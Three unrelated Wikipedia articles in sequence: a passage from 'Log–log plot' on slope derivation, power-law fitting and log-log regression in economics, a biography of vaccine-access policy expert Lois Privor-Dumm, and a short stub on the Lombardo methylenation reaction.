where m = k is the slope of the line ( gradient ) and b = log a is the intercept on the (log y )-axis, meaning where log x = 0, so, reversing the logs, a is the y value corresponding to x = 1. [ 1 ]
The equation for a line on a log–log scale would be: log 10 F ( x ) = m log 10 x + b , {\displaystyle \log _{10}F(x)=m\log _{10}x+b,} F ( x ) = x m ⋅ 10 b , {\displaystyle F(x)=x^{m}\cdot 10^{b},} where m is the slope and b is the intercept point on the log plot.
To find the slope of the plot, two points are selected on the x -axis, say x 1 and x 2 . Using the below equation: log [ F ( x 1 ) ] = m log ( x 1 ) + b , {\displaystyle \log[F(x_{1})]=m\log(x_{1})+b,} and log [ F ( x 2 ) ] = m log ( x 2 ) + b . {\displaystyle \log[F(x_{2})]=m\log(x_{2})+b.} The slope m is found taking the difference: m = log ( F 2 ) − log ( F 1 ) log ( x 2 ) − log ( x 1 ) = log ( F 2 / F 1 ) log ( x 2 / x 1 ) , {\displaystyle m={\frac {\log(F_{2})-\log(F_{1})}{\log(x_{2})-\log(x_{1})}}={\frac {\log(F_{2}/F_{1})}{\log(x_{2}/x_{1})}},} where F 1 is shorthand for F ( x 1 ) and F 2 is shorthand for F ( x 2 ). The figure at right illustrates the formula. Notice that the slope in the example of the figure is negative . The formula also provides a negative slope, as can be seen from the following property of the logarithm: log ( x 1 / x 2 ) = − log ( x 2 / x 1 ) . {\displaystyle \log(x_{1}/x_{2})=-\log(x_{2}/x_{1}).}
The above procedure now is reversed to find the form of the function F ( x ) using its (assumed) known log–log plot. To find the function F , pick some fixed point ( x 0 , F 0 ), where F 0 is shorthand for F ( x 0 ), somewhere on the straight line in the above graph, and further some other arbitrary point ( x 1 , F 1 ) on the same graph. Then from the slope formula above: m = log ( F 1 / F 0 ) log ( x 1 / x 0 ) {\displaystyle m={\frac {\log(F_{1}/F_{0})}{\log(x_{1}/x_{0})}}} which leads to log ( F 1 / F 0 ) = m log ( x 1 / x 0 ) = log [ ( x 1 / x 0 ) m ] . {\displaystyle \log(F_{1}/F_{0})=m\log(x_{1}/x_{0})=\log[(x_{1}/x_{0})^{m}].} Notice that 10 log 10 ( F 1 ) = F 1 . Therefore, the logs can be inverted to find: F 1 F 0 = ( x 1 x 0 ) m {\displaystyle {\frac {F_{1}}{F_{0}}}=\left({\frac {x_{1}}{x_{0}}}\right)^{m}} or F 1 = F 0 x 0 m x m , {\displaystyle F_{1}={\frac {F_{0}}{x_{0}^{m}}}\,x^{m},} which means that F ( x ) = c o n s t a n t ⋅ x m . {\displaystyle F(x)=\mathrm {constant} \cdot x^{m}.} In other words, F is proportional to x to the power of the slope of the straight line of its log–log graph. Specifically, a straight line on a log–log plot containing points ( x 0 , F 0 ) and ( x 1 , F 1 ) will have the function: F ( x ) = F 0 ( x x 0 ) log ( F 1 / F 0 ) log ( x 1 / x 0 ) , {\displaystyle F(x)={F_{0}}\left({\frac {x}{x_{0}}}\right)^{\frac {\log(F_{1}/F_{0})}{\log(x_{1}/x_{0})}},} Of course, the inverse is true too: any function of the form F ( x ) = c o n s t a n t ⋅ x m {\displaystyle F(x)=\mathrm {constant} \cdot x^{m}} will have a straight line as its log–log graph representation, where the slope of the line is m .
To calculate the area under a continuous, straight-line segment of a log–log plot (or estimating an area of an almost-straight line), take the function defined previously F ( x ) = c o n s t a n t ⋅ x m . {\displaystyle F(x)=\mathrm {constant} \cdot x^{m}.} and integrate it. Since it is only operating on a definite integral (two defined endpoints), the area A under the plot takes the form A ( x ) = ∫ x 0 x 1 F ( x ) d x = c o n s t a n t m + 1 ⋅ x m + 1 | x 0 x 1 {\displaystyle A(x)=\int _{x_{0}}^{x_{1}}F(x)\,dx=\left.{\frac {\mathrm {constant} }{m+1}}\cdot x^{m+1}\right|_{x_{0}}^{x_{1}}}
Rearranging the original equation and plugging in the fixed point values, it is found that c o n s t a n t = F 0 x 0 m {\displaystyle \mathrm {constant} ={\frac {F_{0}}{x_{0}^{m}}}}
Substituting back into the integral, you find that for A over x 0 to x 1
A = F 0 / x 0 m m + 1 ⋅ ( x 1 m + 1 − x 0 m + 1 ) log A = log [ F 0 / x 0 m m + 1 ⋅ ( x 1 m + 1 − x 0 m + 1 ) ] = log F 0 m + 1 − log 1 x 0 m + log ( x 1 m + 1 − x 0 m + 1 ) = log F 0 m + 1 + log ( x 1 m + 1 − x 0 m + 1 x 0 m ) = log F 0 m + 1 + log ( x 1 m x 0 m ⋅ x 1 − x 0 m + 1 x 0 m ) {\displaystyle {\begin{aligned}A&={\frac {F_{0}/x_{0}^{m}}{m+1}}\cdot (x_{1}^{m+1}-x_{0}^{m+1})\\[1.2ex]\log A&=\log \left[{\frac {F_{0}/x_{0}^{m}}{m+1}}\cdot (x_{1}^{m+1}-x_{0}^{m+1})\right]\\&=\log {\frac {F_{0}}{m+1}}-\log {\frac {1}{x_{0}^{m}}}+\log(x_{1}^{m+1}-x_{0}^{m+1})\\&=\log {\frac {F_{0}}{m+1}}+\log \left({\frac {x_{1}^{m+1}-x_{0}^{m+1}}{x_{0}^{m}}}\right)\\&=\log {\frac {F_{0}}{m+1}}+\log \left({\frac {x_{1}^{m}}{x_{0}^{m}}}\cdot x_{1}-{\frac {x_{0}^{m+1}}{x_{0}^{m}}}\right)\end{aligned}}}
Therefore, A = F 0 m + 1 ⋅ [ x 1 ⋅ ( x 1 x 0 ) m − x 0 ] {\displaystyle A={\frac {F_{0}}{m+1}}\cdot \left[x_{1}\cdot \left({\frac {x_{1}}{x_{0}}}\right)^{m}-x_{0}\right]}
For m = −1, the integral becomes A ( m = − 1 ) = ∫ x 0 x 1 F ( x ) d x = ∫ x 0 x 1 c o n s t a n t x d x = F 0 x 0 − 1 ∫ x 0 x 1 d x x = F 0 ⋅ x 0 ⋅ ln x | x 0 x 1 A ( m = − 1 ) = F 0 ⋅ x 0 ⋅ ln x 1 x 0 {\displaystyle {\begin{aligned}A_{(m=-1)}&=\int _{x_{0}}^{x_{1}}F(x)\,dx=\int _{x_{0}}^{x_{1}}{\frac {\mathrm {constant} }{x}}\,dx={\frac {F_{0}}{x_{0}^{-1}}}\int _{x_{0}}^{x_{1}}{\frac {dx}{x}}=F_{0}\cdot x_{0}\cdot {\ln x}{\Big |}_{x_{0}}^{x_{1}}\\A_{(m=-1)}&=F_{0}\cdot x_{0}\cdot \ln {\frac {x_{1}}{x_{0}}}\end{aligned}}}
Log–log plots are often use for visualizing log-log linear regression models with (roughly) log-normal , or Log-logistic , errors. In such models, after log-transforming the dependent and independent variables, a Simple linear regression model can be fitted, with the errors becoming homoscedastic . This model is useful when dealing with data that exhibits exponential growth or decay, while the errors continue to grow as the independent value grows (i.e., heteroscedastic error).
As above, in a log-log linear model the relationship between the variables is expressed as a power law. Every unit change in the independent variable will result in a constant percentage change in the dependent variable. The model is expressed as:
Taking the logarithm of both sides, we get:
This is a linear equation in the logarithms of x {\displaystyle x} and y {\displaystyle y} , with log ( a ) {\displaystyle \log(a)} as the intercept and b {\displaystyle b} as the slope. In which ϵ ∼ Normal ( μ , σ 2 ) {\displaystyle \epsilon \sim {\textrm {Normal}}(\mu ,\sigma ^{2})} , and e ϵ ∼ Log-Normal ( μ , σ 2 ) {\displaystyle e^{\epsilon }\sim {\textrm {Log-Normal}}(\mu ,\sigma ^{2})} .
Figure 1 illustrates how this looks. It presents two plots generated using 10,000 simulated points. The left plot, titled 'Concave Line with Log-Normal Noise', displays a scatter plot of the observed data (y) against the independent variable (x). The red line represents the 'Median line', while the blue line is the 'Mean line'. This plot illustrates a dataset with a power-law relationship between the variables, represented by a concave line.
When both variables are log-transformed, as shown in the right plot of Figure 1, titled 'Log-Log Linear Line with Normal Noise', the relationship becomes linear. This plot also displays a scatter plot of the observed data against the independent variable, but after both axes are on a logarithmic scale. Here, both the mean and median lines are the same (red) line. This transformation allows us to fit a Simple linear regression model (which can then be transformed back to the original scale - as the median line).
The transformation from the left plot to the right plot in Figure 1 also demonstrates the effect of the log transformation on the distribution of noise in the data. In the left plot, the noise appears to follow a log-normal distribution , which is right-skewed and can be difficult to work with. In the right plot, after the log transformation, the noise appears to follow a normal distribution , which is easier to reason about and model.
This normalization of noise is further analyzed in Figure 2, which presents a line plot of three error metrics ( Mean Absolute Error - MAE, Root Mean Square Error - RMSE, and Mean Absolute Logarithmic Error - MALE) calculated over a sliding window of size 28 on the x-axis. The y-axis gives the error, plotted against the independent variable (x). Each error metric is represented by a different color, with the corresponding smoothed line overlaying the original line (since this is just simulated data, the error estimation is a bit jumpy). These error metrics provide a measure of the noise as it varies across different x values.
Log-log linear models are widely used in various fields, including economics, biology, and physics, where many phenomena exhibit power-law behavior. They are also useful in regression analysis when dealing with heteroscedastic data, as the log transformation can help to stabilize the variance.
These graphs are useful when the parameters a and b need to be estimated from numerical data. Specifications such as this are used frequently in economics .
One example is the estimation of money demand functions based on inventory theory , in which it can be assumed that money demand at time t is given by M t = A R t b Y t c U t , {\displaystyle M_{t}=AR_{t}^{b}Y_{t}^{c}U_{t},} where M is the real quantity of money held by the public, R is the rate of return on an alternative, higher yielding asset in excess of that on money, Y is the public's real income , U is an error term assumed to be lognormally distributed , A is a scale parameter to be estimated, and b and c are elasticity parameters to be estimated. Taking logs yields m t = a + b r t + c y t + u t , {\displaystyle m_{t}=a+br_{t}+cy_{t}+u_{t},} where m = log M , a = log A , r = log R , y = log Y , and u = log U with u being normally distributed . This equation can be estimated using ordinary least squares .
Another economic example is the estimation of a firm's Cobb–Douglas production function , which is the right side of the equation Q t = A N t α K t β U t , {\displaystyle Q_{t}=AN_{t}^{\alpha }K_{t}^{\beta }U_{t},} in which Q is the quantity of output that can be produced per month, N is the number of hours of labor employed in production per month, K is the number of hours of physical capital utilized per month, U is an error term assumed to be lognormally distributed, and A , α {\displaystyle \alpha } , and β {\displaystyle \beta } are parameters to be estimated. Taking logs gives the linear regression equation q t = a + α n t + β k t + u t {\displaystyle q_{t}=a+\alpha n_{t}+\beta k_{t}+u_{t}} where q = log Q , a = log A , n = log N , k = log K , and u = log U .
Log–log regression can also be used to estimate the fractal dimension of a naturally occurring fractal .
However, going in the other direction – observing that data appears as an approximate line on a log–log scale and concluding that the data follows a power law – is not always valid. [ 2 ]
In fact, many other functional forms appear approximately linear on the log–log scale, and simply evaluating the goodness of fit of a linear regression on logged data using the coefficient of determination ( R 2 ) may be invalid, as the assumptions of the linear regression model, such as Gaussian error, may not be satisfied; in addition, tests of fit of the log–log form may exhibit low statistical power , as these tests may have low likelihood of rejecting power laws in the presence of other true functional forms. While simple log–log plots may be instructive in detecting possible power laws, and have been used dating back to Pareto in the 1890s, validation as a power laws requires more sophisticated statistics. [ 2 ]
These graphs are also extremely useful when data are gathered by varying the control variable along an exponential function, in which case the control variable x is more naturally represented on a log scale, so that the data points are evenly spaced, rather than compressed at the low end. The output variable y can either be represented linearly, yielding a lin–log graph (log x , y ), or its logarithm can also be taken, yielding the log–log graph (log x , log y ).
Bode plot (a graph of the frequency response of a system) is also log–log plot.
In chemical kinetics , the general form of the dependence of the reaction rate on concentration takes the form of a power law ( law of mass action ), so a log-log plot is useful for estimating the reaction parameters from experiment. | https://en.wikipedia.org/wiki/Log–log_plot |
Lois Privor-Dumm is an American public policy expert in the field of vaccine introduction.
Her work with new vaccine introduction, which has included strategies to accelerate access in low and middle-income countries, policy research, advocacy, communications and large country introduction. She currently serves as the Director of Alliances & Information at the International Vaccine Access Center (IVAC) at the Johns Hopkins Bloomberg School of Public Health . Her team conducts advocacy and communications for child health, coordination of the World Pneumonia Day Coalition and working with large countries such as India and Nigeria to provide technical assistance in the form of advocacy and communications, evidence synthesis, stakeholder mapping and research to help countries develop strategies to address the barriers to decision making and implementation for new vaccines. [ citation needed ]
Her team has worked closely with a variety of stakeholders in India and Nigeria and is focused on building both high-level political and grassroots support. She is currently leading projects in India and Nigeria made possible through grants from the GAVI Alliance and Bill & Melinda Gates Foundation . [ citation needed ]
She is a member of the GAVI Large Country Task Team and the PDP Access Steering Committee and has worked on a number of access related projects dealing with economics and financing, supply, distribution and demand forecasting in addition to her work with advocacy, communications and policy. [ 1 ] [ 2 ] [ 3 ]
Ms. Privor-Dumm holds an International MBA (IMBA), formerly Masters in International Business (MIBS), from the University of South Carolina and completed her studies and internship in Brussels, Belgium. She completed her undergraduate studies at the University at Albany in Business Administration (Finance) and Spanish. [ citation needed ]
In 2005, she joined The Johns Hopkins Bloomberg School of Public Health to lead Communications & Strategy for the Hib Initiative, a GAVI-funded project with an aim to accelerate and sustain decisions regarding Hib vaccines to help prevent meningitis and pneumonia in children. Now serving as Director of Alliances and Information for IVAC, she has been cited as an expert for different global vaccine campaigns and been involved in research and promotion of vaccine awareness. She has been interviewed by Developments Magazine [ 4 ] and African Press International [ 5 ] about the availability of pneumonia related vaccines in African countries.
She worked on different communication tools regarding the availability of vaccines in developing countries [ 6 ] to raise awareness about the value of pneumococcal and Hib vaccinations to prevent pneumonia and reach Millennium Development Goals 4 by 2015. [ 7 ]
The mission of the Accelerated Vaccine Introduction Initiative (AVI) is to save lives, prevent disease and promote health through timely and equitable access to new and underused
vaccines. Together, AVI partners serve to:
The Accelerated Vaccine Initiative Technical Advisory Consortium (AVI TAC) supports the achievement of AVI objectives through its leadership in creating the evidence base, advocating for evidence-driven decision-making, and building platform capacity that can be used to accelerate the introduction of future vaccines. [ citation needed ] | https://en.wikipedia.org/wiki/Lois_Privor-Dumm |
In organic chemistry , the Lombardo methylenation is a name reaction that allows for the methylenation of carbonyl compounds with the use of Lombardo's reagent, which is a mix of zinc , dibromomethane , and titanium tetrachloride . [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ]
The Lombardo methylenation has been used in the total synthesis of tetrodotoxin [ 8 ] and hirustene. [ 9 ] [ 10 ]
This chemical reaction article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Lombardo_methylenation |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.